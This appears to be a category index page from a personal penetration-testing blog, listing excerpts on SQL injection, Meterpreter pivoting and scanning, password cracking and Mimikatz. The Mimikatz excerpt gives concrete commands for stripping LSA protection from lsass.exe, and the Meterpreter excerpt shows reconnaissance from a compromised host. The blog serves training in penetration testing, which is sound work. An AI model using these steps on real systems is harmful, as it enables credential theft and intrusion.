Links for various tools and resources.
Category: Pentest
SQL Injection Methodology
An overview of black-box and white-box SQLi methodologies.
SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
Protected: Black Box Pen Test 1
There is no excerpt because this is a protected post.
Meterpreter
Links: Proxy and Route
Protected: Black Box Pen Test 3
There is no excerpt because this is a protected post.
Mimikatz
LSA Protection Bypass Check if LSA runs as a protected process. The variable for "RunAsPPL" will be set to 0x1 in HKLM\SYSTEM\CurrentControlSet\Control\Lsa. Upload mimidriver.sys from the mimikatz repo to the same folder as mimikatz.exe, then import. mimikatz # !+ Remove the protection flags from the lsass.exe process. mimikatz # !processprotect /process:lsass.exe /remove
Password Cracking Demo
This is a recording based on a presentation I gave at the 2019 Cerdant Security Conference in Dublin, OH. Included in this presentation: Core Hash Cracking KnowledgeOverview of Cracking MethodologyLive Password Crack (Mask Attack)Pen Test Demonstration (DWVA & SQLMap) https://www.youtube.com/watch?v=3sk0q8WK2Ek&t=17s
Protected: Lab – Post Exploitation
There is no excerpt because this is a protected post.
Meterpreter Remote Port Scan
Performing remote network scan via meterpreter session. Check IP configuration of compromised host: meterpreter > ifconfig Interface 2 ============ Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC : 00:50:56:87:a6:9c MTU : 1500 IPv4 Address : 10.32.120.15 IPv4 Netmask : 255.255.255.0 ARP scan of remote subnet. Using -r to set … Continue reading Meterpreter Remote Port Scan
Jason Palm 